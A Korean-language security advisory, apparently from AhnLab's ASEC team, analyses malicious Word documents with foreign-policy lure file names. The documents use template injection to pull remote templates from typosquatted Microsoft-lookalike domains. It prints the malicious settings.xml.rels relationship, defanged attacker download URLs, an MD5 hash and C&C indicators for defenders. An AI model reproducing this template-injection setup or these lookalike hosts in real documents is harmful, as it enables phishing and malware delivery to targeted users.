MS Office 정상 URL 위장하여 유포중인 워드문서

최근 워드 문서로 위장한 악성코드가 특정 경로(ex. 카카오톡 단체대화방)를 중심으로 유포되는 이슈가 공유된 바 있다.

ASEC 분석팀은 추가 모니터링 과정에서, 유사 워드문서에 사용된 URL이 정상 URL과 유사성 측면에서 매우 교묘해지는 정황을 확인하여 사용자들에게 주의를 당부하고자 한다.

내부적으로 현재까지 확인된 악성 워드문서의 파일명은 다음과 같다.
파일명에서 확인되는 내국인의 실명은 삭제처리(○○○)하였는데, 외교안보 분야의 전문가인 점과 파일명도 대북/대중/설문지/외교안보와 관련된 특징이 있었다.

  • 북방한계선(NLL) 문제에 관한 국제법적 검토와.docx
  • 시진핑 3기체제 출범의 함의와 전망.docx
  • 국가보위성 기구.docx
  • 北, 전례 없는 강공 도발 설문지.docx
  • ○○○, RIES_이슈인사이트_Vol.33, 시진핑 제3기 출범- 중국은 어디고 가고 있나.docx
  • (토론2_참고-1)칩(Chip)_4동명과한국의선택(○○○기고문).docx
  • (토론2__참고-2)칩4동맹과대외전략(○○○기고문).docx
  • (월드코리안) 시진핑 제3기 출범의 함의와 향후 전망.docx
  • 패션과 인권 설문지.docx

위의 파일들은 모두 OOXML(Office Open XML) 포맷을 가진 워드문서이며 Template Injetion 기능을 공격에 활용하였는데, 아래의 XML코드는 특정 워드 파일 내부에 존재하는 settings.xml.rels 파일을 나타낸 것이다.

<?xml version="1.0" encoding="UTF-8" standalone="yes"
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="hxxp://schemas.openxmlformat[.]org/officeDocument/2006/relationships/o/word
officeid=NPW5D●●●DBS3V" TargetMode="External"/></Relationships>

주목할만한 점은, External URL로 사용된 주소가 정상 URL의 유사성이 매우 높아졌다는 것이다. 아래 URL의 루트도메인 영역을 보면 openxmlformats.org 와 openxmlformat[.]org 으로 s 스펠링 한 개 차이를 두어 정교하게 조작한 것을 알 수 있다.

  • 정상 URL : http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate
  • 악성 URL : hxxp://schemas.openxmlformat[.]org/officeDocument/2006/relationships/o/word?officeid=NPW5D●●●DBS3V

그 외에도 아래와 같은 포맷의 URL을 공격에 사용하는 정황이 확인되었는데, ms-office[.]services / ms-offices[.]com / offices.word-template[.]net 과 같이 자칫하면 정상 도메인으로 판단될만큼 교묘하게 조작한 것을 알 수 있다.

  • hxxps://ms-office[.]services/templates-for-word/download?id=79B9●●●I9RWT
  • hxxps://ms-office[.]services/templates-for-word/download?id=V2BX●●●WE1A
  • hxxps://ms-office[.]services/templates-for-word/download?id=I5I2●●●MGW
  • hxxps://ms-office[.]services/templates-for-word/download?id=EFHO●●●5UCV
  • hxxps://ms-offices[.]com/templates-for-word/download?id=ZQ9H●●●YP8G
  • hxxps://ms-offices[.]com/templates-for-word/download?id=AL03●●●KZ2
  • hxxps://ms-offices[.]com/templates-for-word/download?id=DTF●●●SE6
  • hxxp://offices.word-template[.]net/office/template?view=GYIJ●●●0D4E

수집된 일부 워드문서의 속성을 통해 아래와 같이 짧은 간격으로 수 일에 걸쳐 무분별하게 생산 및 배포하는 정황을 확인할 수 있었다.

사용자는 V3를 최신 버전으로 업데이트하여 사용하고 출처가 불분명한 문서파일 실행을 자제해야 한다.

또한, 최근 무분별하게 악성문서가 유포되고 있는 동향을 고려하여 신뢰할만한 사용자로부터 파일을 전달 받았다고 하더라도 발신자에게 송신 여부를 정확히 확인 후 열람할 것을 권고한다.

[파일 진단]
– Downloader/DOC.External (2022.11.01.01)
– Downloader/DOC.Kimsuky (2022.11.05.00, 2022.11.06.00, 2022.11.10.01 외 다수)
– Downloader/XML.Generic (2022.11.11.03)

[IOC]
MD5
– d698fccf14f670595442155395f42642

C&C
– hxxps://ms-office[.]services
– hxxps://ms-offices[.]com
– hxxp://offices.word-template[.]net
– hxxp://schemas.openxmlformat[.]org

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

5 1 vote
별점 주기
Subscribe
Notify of
guest

0 댓글
Inline Feedbacks
View all comments